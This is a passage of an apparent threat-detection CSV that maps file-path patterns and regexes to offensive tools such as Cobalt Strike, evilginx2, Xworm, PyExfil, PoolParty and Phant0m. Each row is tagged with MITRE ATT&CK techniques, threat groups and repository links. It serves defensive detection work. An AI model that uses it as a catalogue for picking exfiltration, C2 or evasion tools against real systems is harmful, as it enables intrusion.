T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/PEzor/inject.cpp*",".{0,1000}\/PEzor\/inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/pfsense_clickjacking*",".{0,1000}\/pfsense_clickjacking.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/pgsql-brute.nse*",".{0,1000}\/pgsql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Phant0m.git*",".{0,1000}\/Phant0m\.git.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*/phant0m-exe*",".{0,1000}\/phant0m\-exe.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*/PhishCreds.ps1*",".{0,1000}\/PhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/phishing.py*",".{0,1000}\/phishing\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/Phishing.sh*",".{0,1000}\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/phishing/*.html*",".{0,1000}\/phishing\/.{0,1000}\.html.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/phishing/password_box*",".{0,1000}\/phishing\/password_box.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/PhishingServer/*",".{0,1000}\/PhishingServer\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/phishlets/example.yaml*",".{0,1000}\/phishlets\/example\.yaml.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/php-backdoor.php*",".{0,1000}\/php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*/PHVNC.exe*",".{0,1000}\/PHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/PickleC2.git*",".{0,1000}\/PickleC2\.git.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*/pid:1337 */dll:*",".{0,1000}\/pid\:1337\s.{0,1000}\/dll\:.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*/PILOT/ATC.py*",".{0,1000}\/PILOT\/ATC\.py.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*/PILOT/PILOT.ps1*",".{0,1000}\/PILOT\/PILOT\.ps1.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*/ping6.py*",".{0,1000}\/ping6\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/PingRAT.git*",".{0,1000}\/PingRAT\.git.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*/PipeViewer.exe*",".{0,1000}\/PipeViewer\.exe.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer.git*",".{0,1000}\/PipeViewer\.git.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer.sln*",".{0,1000}\/PipeViewer\.sln.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer/Program.cs*",".{0,1000}\/PipeViewer\/Program\.cs.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/pitty_tiger.profile*",".{0,1000}\/pitty_tiger\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/pivotnacci.git*",".{0,1000}\/pivotnacci\.git.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*/pivotnaccilib*",".{0,1000}\/pivotnaccilib.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*/pjl-info-config.nse*",".{0,1000}\/pjl\-info\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/pjl-ready-message.nse*",".{0,1000}\/pjl\-ready\-message\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pkg/merlin.go*",".{0,1000}\/pkg\/merlin\.go.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/pkg/state/sudoers.go*",".{0,1000}\/pkg\/state\/sudoers\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/PKINITtools*",".{0,1000}\/PKINITtools.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*/Plazmaz/LNKUp*",".{0,1000}\/Plazmaz\/LNKUp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Plugins/HRDP.dll*",".{0,1000}\/Plugins\/HRDP\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Plugins/HVNC.dll*",".{0,1000}\/Plugins\/HVNC\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/Plugins/PreventSleep.dll*",".{0,1000}\/Plugins\/PreventSleep\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/PoC/PrivilegeEscalation*",".{0,1000}\/PoC\/PrivilegeEscalation.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*/POC_DLL.vcxproj*",".{0,1000}\/POC_DLL\.vcxproj.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/PoC-CVE-2023-21554*",".{0,1000}\/PoC\-CVE\-2023\-21554.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/poisoners/*.py",".{0,1000}\/poisoners\/.{0,1000}\.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/polenum.py*",".{0,1000}\/polenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/PoolParty.cpp*",".{0,1000}\/PoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.exe*",".{0,1000}\/PoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.git*",".{0,1000}\/PoolParty\.git.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.hpp*",".{0,1000}\/PoolParty\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.sln*",".{0,1000}\/PoolParty\.sln.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolParty.vcxproj*",".{0,1000}\/PoolParty\.vcxproj.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/PoolPartyBof.c*",".{0,1000}\/PoolPartyBof\.c.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*/PoolPartyBof.git*",".{0,1000}\/PoolPartyBof\.git.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*/PoolPartyBof.x64.o*",".{0,1000}\/PoolPartyBof\.x64\.o.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*/pop_exfil_client.py*",".{0,1000}\/pop_exfil_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/pop_exfil_server.py*",".{0,1000}\/pop_exfil_server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/pop3-brute.nse*",".{0,1000}\/pop3\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pop3-capabilities.nse*",".{0,1000}\/pop3\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pop3-ntlm-info.nse*",".{0,1000}\/pop3\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/popCalc.bin*",".{0,1000}\/popCalc\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 